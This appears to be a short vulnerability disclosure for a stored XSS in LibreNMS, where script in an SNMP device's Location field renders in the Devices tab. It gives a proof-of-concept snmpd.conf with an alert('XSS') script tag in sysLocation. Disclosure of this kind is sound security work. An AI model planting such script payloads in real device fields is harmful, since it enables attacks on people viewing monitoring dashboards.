SNMP location XSS vulnerability in librenms/librenms
Dec 19th 2022
By including some HTML in the "Location" field of the snmpd configuration of a managed device, an attacker can inject HTML into the LibreNMS "Devices" tab, which then gets rendered when the page is viewed.
EDIT: I'm having difficulties developing a proper exploit for this beyond the "Alert('XSS')" PoC. But maybe someone more web-savvy than me could get it to work. Dialing down the severity in the meanwhile.
Proof of Concept
// /etc/snmp/snmpd.conf sysLocation <script>alert('XSS')</script> sysContact Me <firstname.lastname@example.org> sysServices 72 master agentx agentaddress udp:161 view systemonly included .184.108.40.206.2.1.1 view systemonly included .220.127.116.11.18.104.22.168 rouser authPrivUser authpriv -V systemonly includeDir /etc/snmp/snmpd.conf.d